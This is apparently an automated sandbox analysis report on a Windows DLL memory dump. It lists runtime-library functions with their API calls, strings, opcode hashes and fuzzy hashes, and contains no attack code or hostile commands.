Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D47BA54
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BA74
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BA92

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 53b523744640f9b22238500d7426eceabd7a7a08a11717a14ed15d9745e94693
Instruction ID: 138878d2f34deaac6d5ac750ce45965dff2197b52e02461f7c5820766d997cd0
Opcode Fuzzy Hash: 53b523744640f9b22238500d7426eceabd7a7a08a11717a14ed15d9745e94693
Instruction Fuzzy Hash: 0F119A36C082298BCF25DBA4C884EEE77B5AF85324F26040DD615AB290DF349E05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480804, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48080B
std::_Lockit::_Lockit.LIBCPMT ref: 6D480815

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480866
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480886
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4808A4

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a98422c4df8f8e052703ecf273ac0dab096814e122ce27578669e02cd86a4351
Instruction ID: 501574e1bb70185e12b83917f32164f2108c4853dd2509aec750a55c50116b95
Opcode Fuzzy Hash: a98422c4df8f8e052703ecf273ac0dab096814e122ce27578669e02cd86a4351
Instruction Fuzzy Hash: 7311EC32C042298BCF19DFA1D844EEE7B75AF85394F26040DE610AB290DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4808AA, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4808B1
std::_Lockit::_Lockit.LIBCPMT ref: 6D4808BB

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48090C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48092C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48094A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3229c4b8c7bf10d7e66027bac29d40bc812933f2ed64c00864241529a6f299d9
Instruction ID: b549fafeacd3f6e5dae217e54e72226aeb4e8f047809c4f45a83c76aeb2e0ffc
Opcode Fuzzy Hash: 3229c4b8c7bf10d7e66027bac29d40bc812933f2ed64c00864241529a6f299d9
Instruction Fuzzy Hash: 5011AC3280412A8BCF15DFA6C840EEE77B5AF85364F26040DD610AB2A1DF74EE01DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BA98, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D47BA9F
std::_Lockit::_Lockit.LIBCPMT ref: 6D47BAA9

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D47BAFA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BB1A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BB38

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 41f1bec44750d7a6432a94056eb96aae3fb122a0f726fbcb7ada1c4c7a32fb8f
Instruction ID: edf9d1510de5de9a4b89afd188f08ec27bcbe927fa6e0934a101447e8da26bcd
Opcode Fuzzy Hash: 41f1bec44750d7a6432a94056eb96aae3fb122a0f726fbcb7ada1c4c7a32fb8f
Instruction Fuzzy Hash: 88119A729042298BCF25DBA5C844EEE7775AF85328F26440DDA10AB390DF749E01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48075E, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480765
std::_Lockit::_Lockit.LIBCPMT ref: 6D48076F

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D4807C0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4807E0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4807FE

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 178cb6a08829835e754e2cbde1bae878978741f6a86a1b0a5b6e98df282aca1e
Instruction ID: 177bcea6f51a6758e95a3f8c7eabc97e9f89100572e05defd5642680c2618e72
Opcode Fuzzy Hash: 178cb6a08829835e754e2cbde1bae878978741f6a86a1b0a5b6e98df282aca1e
Instruction Fuzzy Hash: 7D119A36C042298BCF05DBA6C880EEE7775AF85764F26041DD611AB2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481118, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48111F
std::_Lockit::_Lockit.LIBCPMT ref: 6D481129

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48117A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48119A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4811B8

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 63fac249bb9199b4735a7097ea67c4390d4c1cdb9fabf93bed118768e4c7572c
Instruction ID: a64a38f7622a72738fa2c718d071efc2c267bad24b69968b7ee469d6923e52d0
Opcode Fuzzy Hash: 63fac249bb9199b4735a7097ea67c4390d4c1cdb9fabf93bed118768e4c7572c
Instruction Fuzzy Hash: 10119A368042299BCF15DFA4C844EFE7B75AF86354F26040ED625AB290DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481072, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D481079
std::_Lockit::_Lockit.LIBCPMT ref: 6D481083

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D4810D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4810F4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D481112

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a9b635d19ce979826a2aeaf74bf7833fcc6bbe44fafeafd421f52ef29940b219
Instruction ID: 97326177e85ec5436a9785dfc038d60680295897353fa403b150e812f36207e0
Opcode Fuzzy Hash: a9b635d19ce979826a2aeaf74bf7833fcc6bbe44fafeafd421f52ef29940b219
Instruction Fuzzy Hash: 1B11A0329041698BCF15DB65C840EEE7775AF85358F26440EE611AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC438, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4CC450

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CC462
_free.LIBCMT ref: 6D4CC474
_free.LIBCMT ref: 6D4CC486
_free.LIBCMT ref: 6D4CC498

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction ID: 4d67c89da36e85a05af5071ede19e8db2b127fb059a4bd19b2c2f806b34427ef
Opcode Fuzzy Hash: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction Fuzzy Hash: 76F04F7D50920597DF20DE65E581E2633E9AB056227738809F518EBB00D731FCC08AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D458EC0, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 433COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 6D458F61
_strcspn.LIBCMT ref: 6D458F83

Strings

`?Pm, xrefs: 6D459098
`?Pm, xrefs: 6D4590B8

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID: `?Pm$`?Pm
API String ID: 3709121408-3637558579
Opcode ID: a4a88b125e44fa6f685549a930c0cc6ad55e43b2de3c0b55915c341dc01a17a1
Instruction ID: cdc08b6c4fb4c6ec558c9d71a6b2bfa10089b0865f177573e8907be7d36ae7c3
Opcode Fuzzy Hash: a4a88b125e44fa6f685549a930c0cc6ad55e43b2de3c0b55915c341dc01a17a1
Instruction Fuzzy Hash: 35F17AB1A04209DFDF00CFA8C884EEEBBB6FF49304F244169E519AB251D7329D55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B98FE, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 6D4B9AB0
__freea.LIBCMT ref: 6D4B9ACE

Strings

a/p, xrefs: 6D4B9B95
am/pm, xrefs: 6D4B9B31

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 72a163d51cec1e8297d3f827bb9f8439cb8b45b3bf03417a9dd89b8d822e9abb
Instruction ID: 48e98db90652afe0505820be9fa2337e743f55907a3ff0552a26e73935940f32
Opcode Fuzzy Hash: 72a163d51cec1e8297d3f827bb9f8439cb8b45b3bf03417a9dd89b8d822e9abb
Instruction Fuzzy Hash: AAD1EE319142878BDB158F69C890FBABBB4FF3A310F208159E915AB354D3769D81CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2A87, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

L<Km, xrefs: 6D4C2B86

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: L<Km
API String ID: 0-4252610374
Opcode ID: 742ef1c9eb889bb90afcf8e5ed4cbb2d365dee05295a2e767de8c5f91f338334
Instruction ID: 527e53a791ee1cc964f81fa84e191f59de085f45ab9be425f9c54236223fa4f7
Opcode Fuzzy Hash: 742ef1c9eb889bb90afcf8e5ed4cbb2d365dee05295a2e767de8c5f91f338334
Instruction Fuzzy Hash: 8651B879D5820A9FDF21CFA9C884FAE7BB4BF16314F115149E514A7250DFB09D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D453C40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453D8D

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,6D479030,6D4D78BB,00000000,?,00000000,?,?,?,?,6D479030,6D4D78BB,6D5308C4,?,6D4D78BB), ref: 6D492554

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453DD2

Strings

ios_base::badbit set, xrefs: 6D453D97, 6D453DC2
ios_base::failbit set, xrefs: 6D453C5F

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3476068407-1240500531
Opcode ID: 3c6981ca098cfa8813d494cc828ffb421df1c3ed5d55185f7296dbab589766f8
Instruction ID: bc3e35615c2b17c7f82419ee4bd69bd6d969ecc52baef788db02b096c0a55743
Opcode Fuzzy Hash: 3c6981ca098cfa8813d494cc828ffb421df1c3ed5d55185f7296dbab589766f8
Instruction Fuzzy Hash: A541E471904248AFDB04CFA8C848FEEBBB8EF49314F20811DE550AB381D7759E04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D460200, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6D460258
__Getcvt.LIBCPMT ref: 6D4602B7

Strings

false, xrefs: 6D4602FE
true, xrefs: 6D460314

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: f88de54de1948cf083f5532426abaa8ba695a657ceaa9ba1695e638f17ea8b99
Instruction ID: 8876010693cc8eb9b2ca1ac684ec1260a9adf825fc054d6eadb56ea009f3bc8b
Opcode Fuzzy Hash: f88de54de1948cf083f5532426abaa8ba695a657ceaa9ba1695e638f17ea8b99
Instruction Fuzzy Hash: 595193B1C047589FDB11CFE4C840BEEBBB8FF18304F04825AE955AB241EB74A984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C18EF, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6D4C197A
__alldvrm.LIBCMT ref: 6D4C1B7B
__alldvrm.LIBCMT ref: 6D4C1B9D

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 8e20228992ac4f878050e6b93774e1859ad2de3e9488b775846a1f46f7749188
Instruction ID: 1dfe21766bc9e72f2ee19d57164aa36deea68babf4e6145c5b043eb2c133f0eb
Opcode Fuzzy Hash: 8e20228992ac4f878050e6b93774e1859ad2de3e9488b775846a1f46f7749188
Instruction Fuzzy Hash: 11A1587A9043869FE702CF58C890FAEBBE4EF52350F2441ADD5959B381E3358D42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3F56, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,4D8A1055,?,00000000,00000000,?,?,?,?,00000001,?,4D8A1055,00000001,?,?), ref: 6D4C3FA3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4C402C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D4B60DF), ref: 6D4C403E
__freea.LIBCMT ref: 6D4C4047

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,00000001,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4C1849

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 92e1499b1d56a7f005960f67e8d81c2039c533e4d8a503ec73683c5dbcac7bd2
Instruction ID: 05e0e09f78537c155c125e2a50027fdf50212e625966caf5ab1ab347b1616247
Opcode Fuzzy Hash: 92e1499b1d56a7f005960f67e8d81c2039c533e4d8a503ec73683c5dbcac7bd2
Instruction Fuzzy Hash: B7319D36A0020AABDF25CF66DC84EAE3BA5EB45254F114229EC18DB250E739DD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C45E6, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,6D45140C,00000000,00000000,?,6D4C458D,6D45140C,00000000,00000000,00000000,?,6D4C4924,00000006,FlsSetValue), ref: 6D4C4618
GetLastError.KERNEL32(?,6D4C458D,6D45140C,00000000,00000000,00000000,?,6D4C4924,00000006,FlsSetValue,6D507C50,FlsSetValue,00000000,00000364,?,6D4BDF29), ref: 6D4C4624
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4C458D,6D45140C,00000000,00000000,00000000,?,6D4C4924,00000006,FlsSetValue,6D507C50,FlsSetValue,00000000), ref: 6D4C4632

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction ID: bd82ea86bdca110e910f3701ce1c0883a881a8a9b646d3c04cbb85fb896ebdc8
Opcode Fuzzy Hash: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction Fuzzy Hash: D501D43A755223ABCF114E7DCE44E567BA8AB0ABF17260225F919D3244DB24EC01CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6D479031, Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47903D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47904B

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,6D479030,6D4D78BB,00000000,?,00000000,?,?,?,?,6D479030,6D4D78BB,6D5308C4,?,6D4D78BB), ref: 6D492554

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47905D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47906B

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
String ID:
API String ID: 2590316965-0
Opcode ID: 54356679b46670a20673db044c4319404880512f8471cf2b9ada510f9035f3cc
Instruction ID: b9f23f0e99cb76c58567cc39754c282371c580c4670d0646a8e911b6ce8ec9bd
Opcode Fuzzy Hash: 54356679b46670a20673db044c4319404880512f8471cf2b9ada510f9035f3cc
Instruction Fuzzy Hash: 73E08C76C0420C77CF18EAF6D894CCD7B3CAA00100F824468AB10A2442EF70AB18CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D47CFFD, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6D47D004

Part of subcall function 6D47BB3E: __EH_prolog3.LIBCMT ref: 6D47BB45
Part of subcall function 6D47BB3E: std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F
Part of subcall function 6D47BB3E: std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0

_Find_unchecked1.LIBCPMT ref: 6D47D215

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6D47D06C

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
